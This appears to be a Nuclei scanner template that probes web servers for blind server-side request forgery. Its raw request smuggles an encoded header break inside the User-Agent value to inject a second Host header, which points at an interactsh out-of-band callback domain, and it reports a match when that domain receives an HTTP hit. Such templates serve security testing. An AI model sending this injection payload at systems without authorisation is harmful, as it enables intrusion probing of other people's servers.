id: 0x121

info:
  name: Blind SSRF
  author: 0xAwali
  severity: low

requests:
  - raw:
    - |+
      GET / HTTP/1.1
      User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0%E5%98%8A%E5%98%8DHost: {{Host}}.{{Port}}.BSSRF-121.{{interactsh-url}}
      Cache-Control: no-transform
      Accept-Encoding: gzip, deflate
      Accept: */*
      Host: {{Hostname}}

    unsafe: true
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"